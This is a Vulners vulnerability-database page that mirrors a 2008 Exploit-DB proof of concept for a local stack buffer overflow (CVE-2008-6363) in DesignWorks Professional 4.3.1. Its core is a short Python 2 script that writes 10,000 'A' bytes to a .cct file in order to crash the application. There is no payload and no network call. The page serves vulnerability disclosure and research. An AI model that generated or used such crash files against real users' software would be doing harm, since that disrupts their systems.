Lucene search
+L

DesignWorks Professional 4.3.1 - '.CCT' File Local Stack Buffer Overflow (PoC)

🗓️ 06 Dec 2008 00:00:00Reported by CnaphType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

DesignWorks Professional 4.3.1 '.CCT' File Local Stack Buffer Overflow (PoC) by Cn4phu

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6363
6 Dec 200800:00
circl
cve
CVE
CVE-2008-6363
2 Mar 200916:00
cve
cvelist
Cvelist
CVE-2008-6363
2 Mar 200916:00
cvelist
euvd
EUVD
EUVD-2008-6333
2 Mar 200916:00
euvd
nvd
NVD
CVE-2008-6363
2 Mar 200916:30
nvd
openvas
OpenVAS
DesignWorks Professional '.cct' File BOF Vulnerability
18 Mar 200900:00
openvas
openvas
OpenVAS
DesignWorks Professional '.cct' File BOF Vulnerability
18 Mar 200900:00
openvas
prion
Prion
Stack overflow
2 Mar 200916:30
prion
#
#                          I'm Cn4phux
#                  ------  |      ______ _____   (--, __*__  ______
#                  |____|  |  ¤   |    | |       | ! )  |    |     |
#                [ |    |` |      | <> | |-----> |__/   |    |  ¤  | ]
#                  | .. |  |____! |____| |____   |\     |    |-----|
#                                      |        _| \  -----  | ::: |
#                                      |         |  \
#                                |_____|         |   \
#                                                |
#                                                |
#                                               ,|.
#                                              / | \
#                                             |  |  |
#                                             |  _  |
#                                           `._\/.\/_,'
#                                             _( 8 )_
#                                            / '_ _' \
#                                           |  /{_}\  |
#                                           ` |  "  | `
#                                             |     |
#
#
# [+] Application               : DesignWorks Professional 4.3.1
#
# [+] Application's Description : (" DesignWorks Professional Schematic Capture for Windows...,Google-it.)
#
# [+] Bug                       : Local .CCT File Stack Buffer Overflow (PoC)
#
# [+] Author                    : Cn4phux
#
import sys
import os
print "[x] Local Stack Overflow PoC"
try:
   milef = open("x2.cct",'w')

except IOError, e:
    print "Unable to open file ", e
    sys.exit(0)
print "[x] File sucessfully opened for writing."
try:
   milef.write("A" * 10000)
except IOError, e:

    print "Unable to write to file ", e
    sys.exit(0)

print "[x] Exploit successfully written."
milef.close()
print "[x] ."
print "\n[x] Cn4phux made in DZ, Great'z to all Algerians. /Google.dz"

# milw0rm.com [2008-12-06]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Dec 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.05586
27